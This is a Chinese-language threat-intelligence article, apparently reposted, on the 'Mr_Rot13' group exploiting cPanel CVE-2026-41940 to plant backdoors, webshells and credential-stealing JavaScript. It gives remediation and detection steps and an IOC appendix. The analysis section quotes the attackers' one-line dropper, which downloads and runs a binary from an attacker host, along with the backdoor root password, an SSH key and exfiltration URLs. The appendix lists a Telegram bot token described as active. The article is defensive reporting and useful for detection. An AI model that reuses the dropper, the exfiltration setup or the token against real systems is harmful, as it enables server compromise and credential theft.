文章总结: 文档披露威胁行为者Mr_Rot13利用cPanel高危漏洞CVE-2026-41940(CVSS9.8)在全球范围部署后门,通过修改root密码、植入SSH密钥、Webshell和JS窃密代码控制服务器,并关联至2022年历史后门活动。提供漏洞修复指南、失陷检测指标及完整IOC列表。 综合评分: 85 文章分类: 漏洞分析,威胁情报,恶意软件,应急响应,安全运营
威胁行为者Mr_Rot13积极利用CVE-2026-41940漏洞实施后门部署
404号浪漫
2026年5月12日 22:16 北京
在小说阅读器读本章
去阅读
0x01 核心速览
| | | | — | — | | 【事件】 | 【事件】 | | 奇安信XLab披露了一个被内部命名为“Mr_Rot13”的黑客组织,正积极利用cPanel & WHM的认证绕过漏洞(CVE-2026-41940, CVSS 9.8)批量部署后门,窃取凭据并下发远控木马。 | 全球已有超过2000个攻击IP在自动利用该漏洞,波及政府、军事机构(东南亚已有4.37GB敏感文件被盗案例)以及大量Linux服务器。Mr_Rot13至少自2020年起活动,通过植入SSH公钥、Webshell、JS窃密代码及Filemanager远控,持续控制失陷主机。 |
0x02 正文解读
2.1-漏洞背景与野外利用态势
CVE-2026-41940是一个影响cPanel & WHM的高危认证绕过漏洞,CVSS评分9.8,允许攻击者在未认证的情况下远程获取管理员权限。自2026年4月28日漏洞公开披露以来,XLab的CTIA系统持续监测到大量攻击活动,包括挖矿、勒索、僵尸网络传播和后门植入。监视数据显示,全球已有超过2000个攻击源IP参与自动攻击,主要来自德国、美国、巴西、荷兰等地。5月2日,安全社区披露了一起利用该漏洞入侵东南亚政府与军事机构的事件,窃取约4.37GB的2020-2024年敏感文件。
2.2-Mr_Rot13组织发现与溯源
5月4日,XLab在梳理漏洞分发载荷时发现一个与众不同的Go语言“infector”,名为“Payload”,内嵌大量疑似AI生成的土耳其语日志。其主要功能为:修改root密码、植入SSH公钥、部署PHP Webshell、注入恶意JS窃取登录凭证并将数据发送至Telegram群组,最终下发Filemanager远控。溯源发现,该活动使用的下载器域名与2022年上传至VirusTotal且至今零检出的PHP后门共享同一C2域名wrned[.]com,该域名最早可追溯至2020年。攻击者创建的Telegram群组创建者用户名为“0xWR”,后续JS代码中也用Rot13算法隐藏C2,因此XLab将此组织命名为Mr_Rot13。5月4日下午,用户“xrill_y”向Mr_Rot13的Telegram Bot发送消息,疑似惊动了攻击者,次日攻击者便升级样本、更换Bot Token并将Bot移出群组,直到5月7日才重新加入,目前该群组只有3名成员。
2.3-感染器Payload分析
漏洞利用脚本通过cp.dene.[de]com下载名为Update的ELF文件(Payload infector)。XLab共捕获3个版本,最新版MD5为fb1bc3f935fdeb3555465070ba2db33c。若不使用-s参数,程序会输出执行状态,字符串风格显示可能由AI生成。
F=/root/.u$$; (wget -q -O "$F" 'https://cp.dene.[de.com/Update' 2>/dev/null ||curl -sk -o "$F" 'https://cp.dene.[de.com/Update') && chmod 755 "$F" && (nohup "$F" -s >/dev/null 2>&1 &) && sleep 2; rm -f "$F"————————————————————————MD5: fb1bc3f935fdeb3555465070ba2db33cMagic: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, strippedFileName: Update
主要任务是修改受感染系统的密码修改root密码为root:123Qwe123C,并植入SSH公钥
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFIswJUfqrkbm2sIMfNHZn1sOYkxjNzEynqJKFU7qoez cpanel-updater)
从cp.dene.de[.]com下载Webshell(cpanel.py)至/usr/local/cpanel/cgi-sys/cpanel.py,提供文件管理与命令执行。
注入JS代码:下载login.js与login.tmpl到cpanel登录页面目录,窃取用户名、密码、User-Agent等,经Rot13编码的C2(uggcf://jearq.pbz/lbt.cuc?t=3,解码为https[:]//wrned.com/log.php?t=3)回传。
2.4-远控工具Filemanager分析
Filemanager是由Mr_Rot13使用的跨平台远控后门,支持Darwin、Linux、Windows。重点介绍基于 AMD64 CPU 架构的 Linux 样本。其基本信息如下:
MD5: 9305b4ebbb4d39907cf36b62989a6af3MAGIC: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, strippedName: filemanager-linux-amd64
运行时,文件管理器会监听端口参数指定的端口,并为攻击者提供一个通道,使其能够通过网页远程管理被入侵的系统。
实验室对其测试时,可打开操作页面一个非常典型的后台,支持文件管理、远程命令执行和 SHELL 功能。
从wpsock.com下载安装脚本,安装跨平台远控。以下代码片段构建了一个 curl 下载命令,其中 URL 指向文件管理器后门的安装脚本下载地址
https[:]//wpsock[.]com/cpanel/install.sh
敏感信息回传:收集bash历史、SSH数据、数据库密码、Valiases配置等,发送至https://cp.dene.de]com/collect.php,同时通过Telegram Bot冗余外传到群组 -443071772。已发现两个Token,其中第一个已被撤销,当前活跃Token为1190043163:AAFtaUfpui9fqKoRnqOa5XvT6MHLcK1axiU,对应Bot名均为“log_FatherBot”。
2.5-历史后门Helper.php与活动连续性
其团队进行溯源调查时,团队发现了一个名为 helper 的 PHP 文件,该文件于 2022 年上传至 VirusTotal,至今仍未被任何杀毒软件检测到。该文件与 wrned.com 域名通信,并被确认为 PHP 后门程序。
MD5: 2286f126ab4740ccf2595ad1fa0c615cMagic: PHP script textName: helper.php
代码伪装成WordPress的options.php,恶意部分通过XOR混淆。
后门会将请求URL、客户端IP、参数w和User-Agent上报至https://wrned.com/api.php?t=3&c=1,C2返回JSON中的s指示合法性、c为RC4密钥解密内嵌payload。
由于连续跟踪未获得有效响应,最终载荷功能无法解密,但可以确认WordPress是Mr_Rot13的重要目标之一。该后门关联同一C2域名wrned.com,将组织的活动时间线至少推至2022年,结合域名注册信息显示持续性运营长达6年。
0x03 动作指引
3.1-漏洞修复与缓解
cPanel & WHM的CVE-2026-41940允许无认证远程接管,CVSS 9.8。官方已发布漏洞通告,建议受影响的用户依据官方通告进行修复。
公告链接:
https://support.cpanel.net/hc/en-us/articles/40073787579671-Security-CVE-2026-41940-cPanel-WHM-WP2-Security-Update-04-28-2026
3.2-失陷检测与清除
检查以下入侵痕迹:
- 异常root密码(root:123Qwe123C)或SSH authorized_keys中是否包含cpanel-updater公钥。
- 文件系统中是否存在/usr/local/cpanel/cgi-sys/cpanel.py、/usr/local/cpanel/base/unprotected/cpanel/login.js等文件。
- 计划任务或nohup进程执行Update样本。
- Web日志中是否有向wrned.com、cp.dene.de.com、wpsock.com的异常请求。
- 检查Telegram Bot Token及群组通信线索(已公开的Token和群组ID)。
3.3-IOC 附录
文件哈希 (MD5):
2286f126ab4740ccf2595ad1fa0c615c *help.php2de27ca8d97124adaf604b18161a441e *Update29222f5e73dd10088fcf1204aa21f87f *Updatefb1bc3f935fdeb3555465070ba2db33c *Update45fc93426cf08f91c9f9de5f04a12263 *filemanager-darwin-amd64711afb014f64c97d7b31685709c34ce7 *filemanager-darwin-arm6422613c952459e65ce09fb6b5c1c03d47 *filemanager-linux-3869305b4ebbb4d39907cf36b62989a6af3 *filemanager-linux-amd64e49f68a363c867608972680799389daf *filemanager-linux-arm64e1ec6ebb96cf87c785ee6a7da677c059 *filemanager-linux-armv702a5990b11293236e01f174f5999df20 *filemanager-windows-386.exe_bae1f1bce7c82fa86f05b12e2e254cfc *filemanager-windows-amd64.exe_
C2
wrned.]comDownloader URLhttps://cp.dene.]de.com/cpanel.pyhttps://cp.dene.]de.com/login.jshttps://cp.dene.]de.com/adminer.phphttps://cp.dene.]de.com/Updatehttps://wpsock.]com/cpanel/install.shhttps://wpsock.]com/cpanel/dist/filemanager-linux-386https://wpsock.]com/cpanel/dist/filemanager-linux-amd64https://wpsock.]com/cpanel/dist/filemanager-linux-armv7https://wpsock.]com/cpanel/dist/filemanager-linux-arm64https://wpsock.]com/cpanel/dist/filemanager-windows-386.exehttps://wpsock.]com/cpanel/dist/filemanager-windows-amd64.exehttps://wpsock.]com/cpanel/dist/filemanager-darwin-arm64https://wpsock.]com/cpanel/dist/filemanager-darwin-amd64
URL
https://cp.dene.]de.com/collect.phphttps://wrned.]com/log.php
扫描 IP
178.249.209.182149.102.229.146
Telegram Token & Channel & USER ID
Token1190043163:AAEy1FDoB_r8KFiOIqsEpgDQ2k78Ai6BdWk (Revoked)1190043163:AAFtaUfpui9fqKoRnqOa5XvT6MHLcK1axiU (Active )Group-443071772BOT ID:1190043163OxWR ID: 1209569354
0x04 参考链接
1.奇安信XLab威胁简报原文:https://blog.xlab.qianxin.com/mr_rot13-the-elusive-6-year-hacker-group-weaponizing-critical-cpanel-flaws-for-backdoor-deployment/
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:404号浪漫 《威胁行为者Mr_Rot13积极利用CVE-2026-41940漏洞实施后门部署》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论